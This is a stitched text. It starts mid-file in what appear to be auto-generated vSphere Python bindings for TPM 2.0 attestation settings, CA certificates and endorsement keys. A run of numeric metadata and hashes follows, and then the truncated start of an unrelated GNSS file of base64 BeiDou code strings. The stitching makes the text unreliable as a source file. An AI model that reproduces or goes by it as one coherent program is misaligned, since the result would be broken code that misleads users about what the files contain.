return task_instance
def get_task(self,
cluster,
name,
):
"""
Get the TPM endorsement key details on a cluster. This method was added
in vSphere API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type name: :class:`str`
:param name: The endorsement key name.
The parameter must be an identifier for the resource type:
``com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey``.
:rtype: :class: `vmware.vapi.stdlib.client.task.Task`
:return: Task instance
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the name is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if the endorsement key is not found or ``cluster`` doesn't match to
any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('get$task',
{
'cluster': cluster,
'name': name,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'EndorsementKeys.Info'))
return task_instance
class Settings(VapiInterface):
"""
The ``Settings`` interface provides methods to get or update settings
related to the TPM 2.0 attestation protocol behavior. This class was added
in vSphere API 7.0.0.
"""
_VAPI_SERVICE_ID = 'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _SettingsStub)
self._VAPI_OPERATION_IDS = {}
self._VAPI_OPERATION_IDS.update({'get_task': 'get$task'})
self._VAPI_OPERATION_IDS.update({'update_task': 'update$task'})
class Health(Enum):
"""
The ``Settings.Health`` class is indicator for the consistency of the hosts
status in the cluster. This enumeration was added in vSphere API 7.0.0.
.. note::
This class represents an enumerated type in the interface language
definition. The class contains class attributes which represent the
values in the current version of the enumerated type. Newer versions of
the enumerated type may contain new values. To use new values of the
enumerated type in communication with a server that supports the newer
version of the API, you instantiate this class. See :ref:`enumerated
type description page <enumeration_description>`.
"""
NONE = None
"""
No status available. This class attribute was added in vSphere API 7.0.0.
"""
OK = None
"""
Each host in the cluster is in consistent state with the rest hosts in the
cluster. This class attribute was added in vSphere API 7.0.0.
"""
WARNING = None
"""
Attestation is functioning, however there is an issue that requires
attention. This class attribute was added in vSphere API 7.0.0.
"""
ERROR = None
"""
Not all hosts in the cluster are in consistent state. This class attribute
was added in vSphere API 7.0.0.
"""
def __init__(self, string):
"""
:type string: :class:`str`
:param string: String value for the :class:`Health` instance.
"""
Enum.__init__(string)
Health._set_values([
Health('NONE'),
Health('OK'),
Health('WARNING'),
Health('ERROR'),
])
Health._set_binding_type(type.EnumType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.health',
Health))
class Info(VapiStruct):
"""
The ``Settings.Info`` class contains information that describes the TPM 2.0
protocol settings. This class was added in vSphere API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
require_endorsement_keys=None,
require_certificate_validation=None,
health=None,
details=None,
):
"""
:type require_endorsement_keys: :class:`bool`
:param require_endorsement_keys: Require registered TPM endorsement keys.
During attestation, the attested host will always send its
endorsement key to the Attestation Service. With this option is
set, the Attestation Service will only proceed with attestation if
the endorsement key has been added to the list of configured
trusted endorsement keys.. This attribute was added in vSphere API
7.0.0.
:type require_certificate_validation: :class:`bool`
:param require_certificate_validation: Require TPM endorsement key certificate validation.
During attestation, the attested host will send its endorsement key
certificate if one is available. With this option set, the
Attestation Service will validate the endorsement key certificate
against the list of configured trusted TPM CA certificates. Only
endorsement key certificates that are signed by a trusted TPM CA
certificate will be able to successfully attest.. This attribute
was added in vSphere API 7.0.0.
:type health: :class:`Settings.Health`
:param health: A health indicator which indicates whether each host in the cluster
has the same attestation settings. This attribute was added in
vSphere API 7.0.0.
:type details: :class:`list` of :class:`com.vmware.vapi.std_client.LocalizableMessage`
:param details: Details regarding the health.
When the ``Settings.Health`` is not :attr:`Settings.Health.OK` or
:attr:`Settings.Health.NONE`, this member will provide an
actionable description of the issues present.. This attribute was
added in vSphere API 7.0.0.
"""
self.require_endorsement_keys = require_endorsement_keys
self.require_certificate_validation = require_certificate_validation
self.health = health
self.details = details
VapiStruct.__init__(self)
Info._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.info', {
'require_endorsement_keys': type.BooleanType(),
'require_certificate_validation': type.BooleanType(),
'health': type.ReferenceType(__name__, 'Settings.Health'),
'details': type.ListType(type.ReferenceType('com.vmware.vapi.std_client', 'LocalizableMessage')),
},
Info,
False,
None))
class UpdateSpec(VapiStruct):
"""
The ``Settings.UpdateSpec`` class contains information that describes
changes to the TPM 2.0 protocol settings. This class was added in vSphere
API 7.0.0.
.. tip::
The arguments are used to initialize data attributes with the same
names.
"""
def __init__(self,
require_endorsement_keys=None,
require_certificate_validation=None,
):
"""
:type require_endorsement_keys: :class:`bool` or ``None``
:param require_endorsement_keys: Require registered TPM endorsement keys. This attribute was added
in vSphere API 7.0.0.
If None the current state will remain unchanged.
:type require_certificate_validation: :class:`bool` or ``None``
:param require_certificate_validation: Require TPM endorsement key certificate validation. This attribute
was added in vSphere API 7.0.0.
If None the current state will remain unchanged.
"""
self.require_endorsement_keys = require_endorsement_keys
self.require_certificate_validation = require_certificate_validation
VapiStruct.__init__(self)
UpdateSpec._set_binding_type(type.StructType(
'com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings.update_spec', {
'require_endorsement_keys': type.OptionalType(type.BooleanType()),
'require_certificate_validation': type.OptionalType(type.BooleanType()),
},
UpdateSpec,
False,
None))
def get_task(self,
cluster,
):
"""
Return the TPM 2.0 protocol settings. This method was added in vSphere
API 7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:rtype: :class: `vmware.vapi.stdlib.client.task.Task`
:return: Task instance
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if ``cluster`` doesn't match to any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('get$task',
{
'cluster': cluster,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.ReferenceType(__name__, 'Settings.Info'))
return task_instance
def update_task(self,
cluster,
spec,
):
"""
Set the TPM 2.0 protocol settings. This method was added in vSphere API
7.0.0.
:type cluster: :class:`str`
:param cluster: The id of the cluster on which the operation will be executed.
The parameter must be an identifier for the resource type:
``ClusterComputeResource``.
:type spec: :class:`Settings.UpdateSpec`
:param spec: The settings.
:raise: :class:`com.vmware.vapi.std.errors_client.Error`
if there is a generic error.
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidArgument`
if the spec is invalid or cluster id is empty.
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
if ``cluster`` doesn't match to any cluster in the vCenter.
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthenticated`
if the caller is not authenticated.
"""
task_id = self._invoke('update$task',
{
'cluster': cluster,
'spec': spec,
})
task_svc = Tasks(self._config)
task_instance = Task(task_id, task_svc, type.VoidType())
return task_instance
class _CaCertificatesStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
})
list_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'spec': type.ReferenceType(__name__, 'CaCertificates.CreateSpec'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.already_exists':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'AlreadyExists'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates',
request_body_parameter='spec',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates/{name}',
path_variables={
'cluster': 'cluster',
'name': 'name',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.CaCertificate'),
})
get_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/ca-certificates/{name}',
path_variables={
'cluster': 'cluster',
'name': 'name',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
operations = {
'list$task': {
'input_type': list_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'create$task': {
'input_type': create_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'delete$task': {
'input_type': delete_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'get$task': {
'input_type': get_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'list': list_rest_metadata,
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.ca_certificates',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _EndorsementKeysStub(ApiInterfaceStub):
def __init__(self, config):
# properties for list operation
list_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
})
list_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
list_input_value_validator_list = [
]
list_output_validator_list = [
]
list_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for create operation
create_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'spec': type.ReferenceType(__name__, 'EndorsementKeys.CreateSpec'),
})
create_error_dict = {
'com.vmware.vapi.std.errors.already_exists':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'AlreadyExists'),
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
create_input_value_validator_list = [
]
create_output_validator_list = [
]
create_rest_metadata = OperationRestMetadata(
http_method='POST',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys',
request_body_parameter='spec',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for delete operation
delete_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
})
delete_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
delete_input_value_validator_list = [
]
delete_output_validator_list = [
]
delete_rest_metadata = OperationRestMetadata(
http_method='DELETE',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys/{name}',
path_variables={
'cluster': 'cluster',
'name': 'name',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'name': type.IdType(resource_types='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.EndorsementKey'),
})
get_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/endorsement-keys/{name}',
path_variables={
'cluster': 'cluster',
'name': 'name',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
operations = {
'list$task': {
'input_type': list_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': list_error_dict,
'input_value_validator_list': list_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'create$task': {
'input_type': create_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': create_error_dict,
'input_value_validator_list': create_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'delete$task': {
'input_type': delete_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': delete_error_dict,
'input_value_validator_list': delete_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'get$task': {
'input_type': get_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'list': list_rest_metadata,
'create': create_rest_metadata,
'delete': delete_rest_metadata,
'get': get_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.endorsement_keys',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class _SettingsStub(ApiInterfaceStub):
def __init__(self, config):
# properties for get operation
get_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
})
get_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
get_input_value_validator_list = [
]
get_output_validator_list = [
]
get_rest_metadata = OperationRestMetadata(
http_method='GET',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/settings',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
# properties for update operation
update_input_type = type.StructType('operation-input', {
'cluster': type.IdType(resource_types='ClusterComputeResource'),
'spec': type.ReferenceType(__name__, 'Settings.UpdateSpec'),
})
update_error_dict = {
'com.vmware.vapi.std.errors.error':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Error'),
'com.vmware.vapi.std.errors.invalid_argument':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'InvalidArgument'),
'com.vmware.vapi.std.errors.not_found':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'NotFound'),
'com.vmware.vapi.std.errors.unauthenticated':
type.ReferenceType('com.vmware.vapi.std.errors_client', 'Unauthenticated'),
}
update_input_value_validator_list = [
]
update_output_validator_list = [
]
update_rest_metadata = OperationRestMetadata(
http_method='PATCH',
url_template='/vcenter/trusted-infrastructure/trust-authority-clusters/{cluster}/attestation/tpm2/settings',
request_body_parameter='spec',
path_variables={
'cluster': 'cluster',
},
query_parameters={
},
dispatch_parameters={
},
header_parameters={
},
dispatch_header_parameters={
}
)
operations = {
'get$task': {
'input_type': get_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': get_error_dict,
'input_value_validator_list': get_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
'update$task': {
'input_type': update_input_type,
'output_type': type.IdType(resource_types='com.vmware.cis.TASK'),
'errors': update_error_dict,
'input_value_validator_list': update_input_value_validator_list,
'output_validator_list': [],
'task_type': TaskType.TASK_ONLY,
},
}
rest_metadata = {
'get': get_rest_metadata,
'update': update_rest_metadata,
}
ApiInterfaceStub.__init__(
self, iface_name='com.vmware.vcenter.trusted_infrastructure.trust_authority_clusters.attestation.tpm2.settings',
config=config, operations=operations, rest_metadata=rest_metadata,
is_vapi_rest=True)
class StubFactory(StubFactoryBase):
_attrs = {
'CaCertificates': CaCertificates,
'EndorsementKeys': EndorsementKeys,
'Settings': Settings,
}
| 42.439797
| 149
| 0.599448
| 7,126
| 66,970
| 5.467584
| 0.052484
| 0.043427
| 0.044043
| 0.054207
| 0.895976
| 0.880422
| 0.859093
| 0.854551
| 0.849263
| 0.834249
| 0
| 0.005588
| 0.307884
| 66,970
| 1,577
| 150
| 42.466709
| 0.834998
| 0.355906
| 0
| 0.739237
| 1
| 0.00984
| 0.283137
| 0.216657
| 0
| 0
| 0
| 0
| 0
| 1
| 0.03321
| false
| 0
| 0.01722
| 0
| 0.092251
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
72df02610a6150426e0f34df5fb77b467dffa3a5
| 49,754
|
py
|
Python
|
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | 2
|
2020-05-10T17:09:10.000Z
|
2020-05-10T17:09:12.000Z
|
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | null | null | null |
gnsstools/beidou/b2bi_strings.py
|
wumouyan/GNSS-SDR-Python
|
61292c2ba151724538808663e2a6d0b048635401
|
[
"MIT"
] | 2
|
2020-09-12T18:26:44.000Z
|
2020-10-08T12:03:27.000Z
|
b2bi_strings = {
19: "fK4vQqsDwbXp/Hyjlc2EsVthXQCr/wdvCo5ZwrlpJB5eCoDdhJpZkkL+5XbQS5CqG0dz/bvErrAAQzAh2GYKIN7I/fswVYOFBoz5JcJbzv+c00ChoGMsuxzki1iTfyCVuXG8P5zg7FhiLtKUAlNusocKFGkL3dfwvbKNXGUgRGRdOpp5TCAFj7rZOgrMApz5lzdkxBlb4mKBqqdP2MFEIMsKEPE96rCSRvvuYddLTzQx42yoCg49L2yDyd7Fx2p36v3Khz8NtO9ozeigXYULYMzmojkHnkQ6Zi6gUvzdQAzf0t48fM2/CpfFc3mEP+N4vrBkdLWd5sQeS4JsipFIR6apiYzqpFcKAKqOgrUc8FGeKr997pi+TpOttACdfcE9b+MD5Zsh4rfPjMSOnl0j/a37AFtwrGfrFimE46XdKY3e8LkRAzwXmKw4mJaURcPS7AUjnH70W+KFX2ygn+oHwf9q2nr54SOtIEjqbNCDwhzs2mcZ798HaoGvD2v4EbkRUNTumD0HNoezZkQDiyFIme+DgPB5KgPlQY7Xg8a1Cu1i+oT/7DYOhRN6ljp/DE/6YdwzPtHqZI17hbSPMBCl383XN11VlrPSjfUpsb694e8fJhhNFY84qIAWMR1anpBWhyzNtnMHeTh/hi3ZyV4VtsIgCxR2uI4Ovn3vOVa0fMwioSUElU92jp5lzGefwu6i51QKJHnqT5U283XeVqYKC2VS6Z2wJozww2yPtuIPZM+magYzAArS4eaGXwHpF8sg/LmQMZuCaPkUNqXFPO1AiL74YAIYFTCpG0Jq24+ov01NHk6KBHkSDlni2M1Oo5sC8XRu5IfYAC47D8eu8bqDHgHKq34QYnNId1zJ6VZzL+YZco4XCjn3fbkMNA6WSun4KRe27fash2u37eF0y5bbG7ISHkFvd4AVRoLGIzIOXKWFSG4lads8SJL+kHAj60wwMmrsbwz6OD0+AY0sIxNAytix7aYWh2d+gmLqkhyEqv2Jk2jr8vXIoNlEx08bdHEmbQtDWViNwO5vvSBMgGY0EJl4wI5DRw4/R+/PUUqh5oftaOCXDSeslT65oLiN3D8n00kDy28nLm+mH1OCG2yU0ypuSb5jHlojtP5fFG4NokOVwSmFxwFaGWHxH3tSw2vsoNKJGGxgoRKJ/80XVXdgDSIxq/J+prQQNj1OTCi4NBokEIL+toem0XCtRB7MmHhbQ9Zck+0PzthbRG0qot+KJihLQcWuZJ6e4bgFdrUu84Qj48UJhycuVSzzWwajIt1l2U5rw9xRniGDr+1ZdaxwG2Nwkmh0X84cCoIsPGYHl2jtuSrwlJiUBWzMB80RysPoZo8VcQJZ13YXZl/nCa0clPlDoi+FOQodcAqSF9KBWrQnN45pGIuyoNhhUXM2xvWSQG/MeQVqhENE0eEpTDDzhXeqzUBGfmlXuKflhMPwnWjpN6kfJ/A/A4xeKWRw49RKecKP/TGqhqlpcAccGuiDKNKBdiFRUU2lVicI5AlnLq5jFDjQ6AEOLLaXEeYyxR+yh6w7XMQoxH00GbcGFWMnEFfsjiMRvbXp13T0oZcYfHov9ZfdnXxtiqGT7YSKXDyl3jgsK4n4jPrURneLM4CqgrobwwefUrNu4WM02cCoC2KbvRd7fmBQq1MGB17TsaETkX48YPobGeQEoe39+fsBrbpD/WESSZEg7/Z6+49pR",
20: "1a1USvhbJJvwXzAFYKyqtxLNETlX+8CkgYTdFCTDqE4DZF2s4eOxOr/nFIIBzhF1MnJrB+SwbPQ47mv9cJ0Vv06YKt+byDXWfcHB5AE0+ffVnUPE1tSQh7d99QN6wxR1ks3IXAfIM5yPHGhOzjTE+GUiKprbOjwpu9JaRF8OFTkVKToxSKs/9K9NixB0kIlqPiqRlVsjObXfjaYz5CBa/niGxK8oXtTGdT5mIUzaqhxZdogZHqs0q1xEK1d+Fwu/3UBfrwktoKsU2t7UpqN9BnaZiMLV/TfjMzhh9mHY4qvYDdkqzxSgvRpG1Z+o2IbD/SVZFA9IX2PPuEhy6gA12MD3f9aCKxpgMY3j1S3/n7B5m/YCgxb4DhnFfRFKJpYDBL1xRb5vsca959SSz4nt2TxenncpfWiNphwh+biYJW8HHbJWhEGlfLgVn+TIt0zPydwZqm4Bdzw2+ImZq7pWuFdDBI6nBtWjVaHvYKUco2whqjr9EBniKTKGF0rkuBnNkXUTDkP83EeJhra0l/6NJx1U5c6m+KwQfU4hfirZlkNbZflXVPEjmATzK8YqcY8t9+2Euew8DfV2KsX2si7fiBNbs5iPENS9dAS2QK6p7YNSvXAoYWWkqdxQ/C1k7XH+DWdXDVKba8Fj+o9lo7dEeUiMrxVf5l4ogLEvtyZcfUjcym9MBFo+MwSX+2H4eR9EI0jvq4XnQn9Mt3Gs7fZSbLdyApGwBcY0Xk2hjREYrszAxmx9icn/vLAKE7NQMOuGqfN8NlWXt3LsYBvKiuF5CuTDBfMPfTDIxM1yeezKE7VxW8rhKRSk00KecpKXGAGTKG2VWsl1z5AVkbhTNOgTXp+tKBusXzOkN9D/ci2/9vY1gxdFANsWDR66JrsBVuyPDWXWVk8v38wyeBxGK/ICru31Yq8wzE4hgUlk6UaJEt6rE7pl6LaxSZfSvGew+3hqdtbqUHhqYxuvYZ1cC4VWEK/3Ocv5gRSBwd3lW5GOGZEh6c0S8jBmbcTwkB1uWmNBHIOmnKLkQLROo1kDPQLKzYLDN0/p2V6N37QQcI6f2L+NSG+YpELl4ksQyRaO9ZUvWiSMzJeCn80NNd1D7rTSpd8UUW7Zbla19esQDYvWhO7FasGIGJhz28Zcpz05aS+0eS754mqCZ+oiMkSjX+dKrlq3PTRkMzgY2B2Q46j0hv+l2oRWOG3t7/FoJ9dNpgsKcMQzgLLqJTCegQLxkZu8H9avz5/J7lStUCTXL9jqLkZ7icGRvdfPEk0yVFWB5yMRb6+vr8WCz2y1GqVOJ0/iB5qA/znWMG1XtNYnFbSPO7ogwzIczoIqTIZOkAWbzyCiyRsmgPUZOh8FKBXLEp2+matFWDigUsFLo9w8x+OGIYaURDnf7xvyzdanpIe4Ko/HB9g8HbI9ahEwKnEUiyAFuB7Ep8ogXjfFOTTZgn/yFOAFJN897ueinBLytlwAqIignw5c32oRK4pLp3cPPugNp7Bpo0DmnpAYX2uKI6XUIZKGgYwSVFCL7797X9d9VmM1Bev+L9RHOEagzp/TmnWrsbyBTd+WGF8j2Kq9lcRZBlPPPDCLzroKdPz3UeT8peydmbbRRoo09f+qcc8VV23ajQk/iZRTGBMT